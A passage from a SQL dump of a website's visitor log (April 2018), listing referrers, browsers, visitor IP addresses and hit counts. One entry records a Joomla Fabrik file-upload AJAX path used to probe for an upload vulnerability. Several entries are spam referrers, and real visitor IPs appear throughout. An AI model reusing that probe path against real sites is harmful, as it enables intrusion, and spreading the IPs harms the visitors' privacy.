nown','2.18.4','','209.150.108.10','000',1,0),(28459,'2018-04-08','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(28460,'2018-04-08','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.212','000',1,0),(28461,'2018-04-08','http://deart-13.ru/','Unknown','Unknown','Unknown','','5.248.253.101','000',3,0),(28462,'2018-04-08','https://zphiblgz.org','MSIE','Windows','9.0','','74.217.90.250','000',2,0),(28463,'2018-04-08','https://zphiblgz.org','MSIE','Windows','11.0','','74.217.90.250','000',3,0),(28464,'2018-04-08','https://zphiblgz.org','MSIE','Windows','8.0','','74.217.90.250','000',1,0),(28465,'2018-04-08','https://zphiblgz.org','Safari','iPad','10.0','','159.203.123.237','000',1,0),(28466,'2018-04-08','https://zphiblgz.org','Safari','iPad','10.0','','162.243.199.32','000',1,0),(28467,'2018-04-08','https://zphiblgz.org','Firefox','Windows','40.1','','103.87.29.87','000',2,0),(28468,'2018-04-08','http://site.ru','Chrome','Windows','5.0.375.99','','81.2.195.80','000',1,0),(28469,'2018-04-08','http://landliver.org/','Opera','Windows','7.54','','37.115.112.228','000',3,0),(28470,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','158.69.54.29','000',3,0),(28471,'2018-04-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.31','000',1,0),(28472,'2018-04-09','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(28473,'2018-04-09','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','35.177.192.52','000',2,0),(28474,'2018-04-09','https://zphiblgz.org','Safari','Macintosh','6.0.4','','88.99.27.172','000',2,0),(28475,'2018-04-09','https://zphiblgz.org','Chrome','Windows','64.0.3282.119','','144.76.153.198','000',1,0),(28476,'2018-04-09','http://zphiblgz.org/','Chrome','Windows','36.0.1985.125','','220.181.132.197','000',3,0),(28477,'2018-04-09','http://uralsk.xkaz.org/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(28478,'2018-04-09','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.101','000',1,0),(28479,'2018-04-09','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(28480,'2018-04-09','https://zphiblgz.org','Chrome','Windows','11.0.696.68','','208.80.194.32','000',1,0),(28481,'2018-04-09','https://zphiblgz.org','Firefox','Windows','40.1','','203.135.194.137','000',2,0),(28482,'2018-04-09','http://www.columb.net.ua/','MSIE','Unknown','6.0','','46.119.121.22','000',3,0),(28483,'2018-04-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1752.Idio_kHdsSPv1wMGJ2ZUNDEZHeyOvQgU2wqdJcs4U5M.4b4279a14a7ae504f176f314e88af0e2ed16e2e0&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UWVBaHd6dDlKdGYyOXFLNWVfbm5CVnN4aElicmwwV0FWajJ6RFhMWldYQSws&sign=f215497c361b617c7a587ed94e24ffee&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','104.236.64.245','000',2,0),(28484,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','72.52.133.20','000',2,0),(28485,'2018-04-09','https://zphiblgz.org','Chrome','Windows','37.0.2049.0','','159.89.114.190','000',2,0),(28486,'2018-04-09','https://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','159.89.114.190','000',2,0),(28487,'2018-04-09','https://zphiblgz.org','Chrome','Windows','32.0.1667.0','','159.89.114.190','000',1,0),(28488,'2018-04-09','https://zphiblgz.org','Chrome','Windows','29.0.1547.2','','159.89.114.190','000',2,0),(28489,'2018-04-09','https://zphiblgz.org','Firefox','Linux','5.0','','37.187.56.47','000',47,0),(28490,'2018-04-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1752.-cfc-ta8yreFvV14XcZGxRn1wc-qcTXANIgsFG7_YAI.76cb43676dee8d052d6c4869cd3a1c641d608861&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043QlN0VnlwUVpqM0pNeHJubVlVTGQyeDRMSTRvTTVFMTBndzZBZ05pTjlRdyws&sign=51b25c2bc382d8c32ce25ffa6d853fe7&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.227.92','000',2,0),(28491,'2018-04-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1752.bJk4-xe3eg_M9JaiO6ajS9D-_8_OFoVVHssixzVeuVw.4785d7ea88811db579e07876287e511d854dad31&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040TEFiZUhlSExGNnBnX3hISHNVN2FlUlBTUDUtUzlCRzRsWVh0VUgxNkRxZyws&sign=e6fe174bd2de185ff6fac40e207ee495&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.183.4.86','000',2,0),(28492,'2018-04-09','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.30','000',1,0),(28493,'2018-04-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1752._oQySyTNNHMc_AnxuKg3CBAkEeoIiQAzVvWkA7xWsRw.7f8ebd702bdfba8b0d23c5da36227a0534acb590&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040RHBTcF9lS2sxQ0dFeGFidnRkSkkzUnZ1Ym1ZYThMNVd6UTVRVm9mUGpCdyws&sign=f7ee009a0b06c76bd95ec0d912e5fc08&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.166.33','000',2,0),(28494,'2018-04-09','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.27','000',1,0),(28495,'2018-04-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1752.IXS29--qfHhyErwF0RITGCyJS1br4668beyzINOcZv0.5eca5a2df7d1240a321a811bda30024b2a90d4a9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041ZGpQbnk4NnpHXzY0YURLOUhCbXJROFVvVG84Q1JVSTdEY1cyUnJ0X0g3USws&sign=1f1fc637b3174b5842d00aabf59f5638&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.210.65','000',2,0),(28496,'2018-04-09','https://zphiblgz.org','Chrome','Macintosh','52.0.2743.116','','54.183.231.158','000',1,0),(28497,'2018-04-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1752.s3CJMoz0Adscynh5XP_PaaYpphPtBr6IkRrdNDZh9Bg.14983b60b2b005ee158043de535043cc616e1761&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041eDVNVzlLTnVfbkYyV2RrMWNlSXotMW5kVkFka0d6dVp5MF9LcW54eFpkZyws&sign=a3c85d39bec88cc629f65debaa2fb990&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','54.169.177.190','000',2,0),(28498,'2018-04-09','https://zphiblgz.org/','Chrome','Windows','62.0.3202.94','','62.122.88.181','000',2,0),(28499,'2018-04-09','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.31','000',1,0),(28500,'2018-04-09','https://zphiblgz.org','MSIE','Windows','11.0','','216.99.180.220','000',3,0),(28501,'2018-04-09','https://zphiblgz.org','Safari','iPhone','11.0','','216.99.180.243','000',2,0),(28502,'2018-04-09','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','62.122.88.181','000',2,0),(28503,'2018-04-09','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','18.232.119.219','000',1,0),(28504,'2018-04-09','https://www.google.com/','Chrome','Windows','65.0.3325.181','','167.102.136.216','000',4,0),(28505,'2018-04-09','https://zphiblgz.org','Safari','iPad','11.0','','71.255.172.98','000',2,0),(28506,'2018-04-09','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(28507,'2018-04-09','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(28508,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','83.137.192.74','000',2,0),(28509,'2018-04-09','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(28510,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','178.32.13.93','000',2,0),(28511,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','67.220.183.18','000',1,0),(28512,'2018-04-09','https://www.bing.com/','MSIE','Windows','11.0','','170.22.76.10','000',2,0),(28513,'2018-04-09','https://www.google.com/','Chrome','Windows','65.0.3325.181','','167.102.191.18','000',6,0),(28514,'2018-04-09','https://sovetskie-plakaty.ru/','MSIE','Windows','6.0','','178.159.37.55','000',3,0),(28515,'2018-04-09','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(28516,'2018-04-09','https://www.google.com/','Chrome','Windows','64.0.3282.186','','169.237.45.113','000',2,0),(28517,'2018-04-09','https://zphiblgz.org/','Firefox','Windows','37.0','','62.122.88.181','000',2,0),(28518,'2018-04-09','http://svetka.info/','MSIE','Windows','6.0','','46.118.127.172','000',4,0),(28519,'2018-04-09','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1752.8_DEfU17pFyJYnggYAUDAR5muJuXjDPKr62gi89Yi14.fdc1f24ef9bfee61c2c1ae0920339c5ae9ee6ea8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042QXJuaDNuRW5OY2NkNnFBbEJTelpTQ3BTWG90X3lIVlo2X2lROGd5cURVdyws&sign=58ea70557ad12caf8857ac535f35fd6d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','178.62.109.4','000',2,0),(28520,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','80.87.203.2','000',4,0),(28521,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','217.64.206.139','000',1,0),(28522,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','178.20.157.65','000',3,0),(28523,'2018-04-09','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','188.240.208.26','000',1,0),(28524,'2018-04-09','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(28525,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','103.253.145.66','000',2,0),(28526,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','167.114.82.126','000',3,0),(28527,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','138.197.217.55','000',2,0),(28528,'2018-04-09','https://zphiblgz.org','Chrome','Macintosh','57.0.2987.110','','46.229.170.197','000',1,0),(28529,'2018-04-09','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.31','000',1,0),(28530,'2018-04-09','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.27','000',1,0),(28531,'2018-04-09','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.27','000',1,0),(28532,'2018-04-09','https://zphiblgz.org','Firefox','Macintosh','33.0','','18.232.119.189','000',1,0),(28533,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','108.61.151.136','000',1,0),(28534,'2018-04-09','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(28535,'2018-04-09','http://zphiblgz.org/','MSIE','Windows','11.0','','104.238.169.3','000',1,0),(28536,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','82.224.181.85','000',6,0),(28537,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','104.131.19.25','000',1,0),(28538,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','217.61.0.54','000',1,0),(28539,'2018-04-09','http://site.ru','Chrome','Windows','5.0.375.99','','69.49.117.145','000',3,0),(28540,'2018-04-09','https://zphiblgz.org/','Firefox','Windows','43.1','','77.220.214.202','000',1,0),(28541,'2018-04-09','https://zphiblgz.org','xpymep','Unknown','Unknown','','77.220.214.202','000',1,0),(28542,'2018-04-09','http://spb-scenar.ru/','MSIE','Windows','6.0','','5.248.253.101','000',3,0),(28543,'2018-04-09','https://documentsite.net/','MSIE','Windows','6.0','','134.249.55.53','000',1,0),(28544,'2018-04-09','https://www.incomekey.net/25881788/creative-sem-services-information-now/','Firefox','Windows','58.0','','112.5.248.196','000',2,0),(28545,'2018-04-09','https://zphiblgz.org','Firefox','Windows','40.1','','46.24.106.163','000',2,0),(28546,'2018-04-09','http://landliver.org/','MSIE','Windows','5.5','','37.115.112.228','000',3,0),(28547,'2018-04-09','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.106','000',1,0),(28548,'2018-04-09','https://zphiblgz.org','Firefox','Windows','53.0','','184.94.240.92','000',2,0),(28549,'2018-04-09','https://www.google.com/','Safari','iPhone','11.0','','207.151.35.13','000',2,0),(28550,'2018-04-09','http://www.google.com/','Chrome','Android','65.0.3325.109','','73.173.254.31','000',2,0),(28551,'2018-04-09','https://workius.ru/','Unknown','Unknown','Unknown','','134.249.55.53','000',1,0),(28552,'2018-04-09','https://zphiblgz.org','Safari','iPad','11.0','','71.166.46.17','000',4,0),(28553,'2018-04-09','https://www.google.com/','Safari','Macintosh','11.1','','157.242.223.253','000',2,0),(28554,'2018-04-09','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','35.177.226.64','000',2,0),(28555,'2018-04-09','https://buy-meds24.com/cialis-fr.html','Unknown','Unknown','Unknown','','46.118.127.172','000',3,0),(28556,'2018-04-10','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.28','000',1,0),(28557,'2018-04-10','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.28','000',1,0),(28558,'2018-04-10','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.32','000',1,0),(28559,'2018-04-10','https://docsarchive.net/','MSIE','Windows','3.02','','134.249.55.53','000',3,0),(28560,'2018-04-10','http://www.inet-shop.su/','MSIE','Windows','3.02','','178.137.86.152','000',2,0),(28561,'2018-04-10','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(28562,'2018-04-10','https://zphiblgz.org/service/zen/','AppleWebKit','Windows','534','','131.253.27.50','000',1,0),(28563,'2018-04-10','https://zphiblgz.org','AppleWebKit','Windows','534','','131.253.25.215','000',1,0),(28564,'2018-04-10','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.27.125','000',1,0),(28565,'2018-04-10','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(28566,'2018-04-10','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.32','000',1,0),(28567,'2018-04-10','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.27','000',1,0),(28568,'2018-04-10','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.30','000',1,0),(28569,'2018-04-10','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(28570,'2018-04-10','http://zahvat.ru/','MSIE','Windows','6.0','','46.119.121.22','000',8,0),(28571,'2018-04-10','https://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','176.109.176.146','000',1,0),(28572,'2018-04-10','https://zphiblgz.org','xpymep','Unknown','Unknown','','176.109.176.146','000',1,0),(28573,'2018-04-10','ZPHIBLGZ.ORG/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','MSIE','Windows','6.0','','91.217.82.159','000',1,0),(28574,'2018-04-10','http://zphiblgz.org/','Opera Next','Windows','19.0.1326.63','','195.22.125.122','000',3,0),(28575,'2018-04-10','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',2,0),(28576,'2018-04-10','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.29','000',1,0),(28577,'2018-04-10','https://www.google.com/','Safari','iPhone','11.0','','96.244.216.219','000',4,0),(28578,'2018-04-10','https://zphiblgz.org','MSIE','Windows','7.0','','34.209.175.228','000',3,0),(28579,'2018-04-10','http://zphiblgz.org','MSIE','Windows','9.0','','107.178.194.41','000',1,0),(28580,'2018-04-10','http://metallo-konstruktsii.ru/','MSIE','Windows','6.0','','178.159.37.55','000',6,0),(28581,'2018-04-10','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',6,0),(28582,'2018-04-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1753.hPS53fOs9R0b-oaokFUXBpC4nir4ETuJkLq8Q5V03YA.03acb66b87b44f7e71abeaa2b62be2daed03a77e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041YWVZZk5OSE9GeTl4YzNCbm5TOEVFQTVDcmdXNFE4WjRlQWVzM0dGd0UyUSws&sign=ed12eba7a2c385047def2841ee606bad&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.189.44','000',2,0),(28583,'2018-04-10','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.139','000',3,0),(28584,'2018-04-10','https://www.google.com/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=2ahUKEwi90JWD4K_aAhVtmK0KHdxECaYQjRx6BAgAEAU&url=https%3A%2F%2Fzphiblgz.org%2Fhistory%2F&psig=AOvVaw2A9jpH8Cp0PdsKKn2wVUhq&ust=1523451169722615','MSIE','Windows','11.0','','167.165.222.49','000',2,0),(28585,'2018-04-10','https://www.google.com/','Chrome','Windows','65.0.3325.181','','71.179.165.166','000',4,0),(28586,'2018-04-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1753.ZgkDsfWkBIB2CuUHtTC17n49wR-eeJmW1ZSvyBzQ_P8.230eee6919df4aad204e5d3cb68b3959b43dcc9b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040enRmMDZ2alg2R0Noc3pxMW5sQnZEMHYySnlaajdDWFpJaUtqN2gzQUVtdyws&sign=6d65b290b3873f587bb9cb60be8976aa&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','103.102.45.13','000',2,0),(28587,'2018-04-10','https://zphiblgz.org','yq','Unknown','Unknown','','185.35.63.191','000',1,0),(28588,'2018-04-10','https://zphiblgz.org','pl','Unknown','Unknown','','185.35.63.29','000',1,0),(28589,'2018-04-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',1,0),(28590,'2018-04-10','https://zphiblgz.org','Safari','iPhone','7.0','','40.77.177.13','000',1,0),(28591,'2018-04-10','zphiblgz.org','Chrome','Windows','58.0.1145.75','','5.135.143.224','000',1,0),(28592,'2018-04-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1753.ce8rcBB8skOsbxfuZq94lg-jK0IOayEmSLC1CZ6NM-k.c4b8b1183aa4f18d08255d95843f2a6f5b506fe5&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042bzZQR19WSFYxOGplbG1QM0xxNFNTeG1BeG5FTU4tUF8yd1hhSEN6MkY4Zyws&sign=43a98c57ecddfb64e25ec2c40cd1c40e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','46.101.24.169','000',2,0),(28593,'2018-04-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1753.EOcMslyE_lJomhIXiAkHJrdJlimMlvhK-ZwW7hOlXPU.b03dbeb3494a5dc1d8e491ac7067896c6c38f357&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040MlFXSFJ6T01Md3Z3TF83M0ktencxX2Vyel80anBCUUdOYXBPMU9YZ1A0dyws&sign=d590816835d65734efa8337a604bb07d&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.206.126','000',2,0),(28594,'2018-04-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.242.140.197','000',2,0),(28595,'2018-04-10','http://www.zphibmaryland.org/chapters/','MSIE','Windows','11.0','','153.31.112.20','000',6,0),(28596,'2018-04-10','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.29','000',1,0),(28597,'2018-04-10','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.29','000',1,0),(28598,'2018-04-10','https://zphiblgz.org','MSIE','Windows','6.0','','139.59.149.99','000',1,0),(28599,'2018-04-10','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1753.nHxU1IxjpOGBcyv8zLGAZa8hEHmx_OybpAG0lyyZ3sU.2d9006555ba599dc7e6d3e1651860f8ed2ac9f9f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VGI0eDlVa0F4WXlld0pYcXdyR1hhSW5jVmN3OUpHY19iaDhRc2MyU3M4QSws&sign=5926d91f1adfb9abaeaa5396bdb82ad5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','104.236.64.245','000',2,0),(28600,'2018-04-10','https://zphiblgz.org','MSIE','Windows','11.0','','161.69.99.11','000',2,0),(28601,'2018-04-10','https://zphiblgz.org','Firefox','Windows','57.0','','205.234.159.77','000',2,0),(28602,'2018-04-10','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.29','000',1,0),(28603,'2018-04-10','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','27.115.124.2','000',2,0),(28604,'2018-04-10','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.67','000',1,0),(28605,'2018-04-10','https://zphiblgz.org','Chrome','Windows','65.0.3325.181','','198.51.197.174','000',3,0),(28606,'2018-04-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(28607,'2018-04-10','https://www.google.com/','Chrome','Windows','65.0.3325.181','','167.102.191.18','000',3,0),(28608,'2018-04-10','https://zphiblgz.org','Firefox','Windows','3.6.7','','208.80.194.32','000',1,0),(28609,'2018-04-10','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.29','000',1,0),(28610,'2018-04-10','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',1,0),(28611,'2018-04-10','http://www.tsatu.edu.ua/','Unknown','Unknown','Unknown','','46.118.127.172','000',2,0),(28612,'2018-04-10','https://zphiblgz.org/scholarship/application/','Chrome','Windows','65.0.3325.181','','73.173.254.31','000',2,0),(28613,'2018-04-10','https://zphiblgz.org','Chrome','Android','25.0.1364.169','','87.118.115.176','000',1,0),(28614,'2018-04-10','https://zphiblgz.org','Chrome','Android','25.0.1364.169','','89.34.237.42','000',2,0),(28615,'2018-04-10','https://zphiblgz.org','Chrome','Android','25.0.1364.169','','62.210.110.181','000',4,0),(28616,'2018-04-10','https://zphiblgz.org','Chrome','Android','25.0.1364.169','','46.165.254.166','000',4,0),(28617,'2018-04-10','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.14.84','000',3,0),(28618,'2018-04-10','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.28','000',1,0),(28619,'2018-04-10','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.28','000',1,0),(28620,'2018-04-10','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(28621,'2018-04-10','https://www.google.com/','Chrome','Android','65.0.3325.109','','73.39.186.188','000',2,0),(28622,'2018-04-10','https://zphiblgz.org','Firefox','Windows','40.1','','187.127.103.187','000',2,0),(28623,'2018-04-10','http://atyrau.xkaz.org/','MSIE','Windows','6.0','','178.137.86.152','000',1,0),(28624,'2018-04-10','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.30','000',1,0),(28625,'2018-04-10','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.104','000',1,0),(28626,'2018-04-10','https://beachtoday.ru/','Opera','Windows','7.11','','5.248.253.101','000',1,0),(28627,'2018-04-10','https://www.google.com/','Edge','Windows','16.16299','','74.177.153.111','000',2,0),(28628,'2018-04-11','https://www.bing.com/','MSIE','Windows','11.0','','165.225.34.135','000',5,0),(28629,'2018-04-11','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','163.172.255.139','000',2,0),(28630,'2018-04-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','184.168.27.34','000',1,0),(28631,'2018-04-11','https://zphiblgz.org','Chrome','Linux','23.0.1271.64','','165.227.233.23','000',2,0),(28632,'2018-04-11','http://landliver.org/','Unknown','Unknown','Unknown','','37.115.112.228','000',3,0),(28633,'2018-04-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','98.130.2.9','000',1,0),(28634,'2018-04-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','213.251.182.110','000',1,0),(28635,'2018-04-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','192.254.250.181','000',1,0),(28636,'2018-04-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','98.139.190.57','000',1,0),(28637,'2018-04-11','https://zphiblgz.org','Firefox','Windows','17.0','','46.246.1.230','000',1,0),(28638,'2018-04-11','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(28639,'2018-04-11','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','66.70.182.111','000',32,0),(28640,'2018-04-11','https://zphiblgz.org','Java','Unknown','1.8.0','','66.70.182.111','000',1,0),(28641,'2018-04-11','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.67.59.131','000',2,0),(28642,'2018-04-11','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.29','000',1,0),(28643,'2018-04-11','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.29','000',1,0),(28644,'2018-04-11','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.29','000',2,0),(28645,'2018-04-11','https://zphiblgz.org','Firefox','Windows','40.1','','1.22.129.21','000',2,0),(28646,'2018-04-11','74.220.219.51','Firefox','Windows','33.0','','162.243.69.215','000',1,0),(28647,'2018-04-11','https://zphiblgz.org','Safari','Macintosh','5.1','','208.87.233.140','000',1,0),(28648,'2018-04-11','https://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(28649,'2018-04-11','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.30','000',1,0),(28650,'2018-04-11','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.31','000',1,0),(28651,'2018-04-11','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text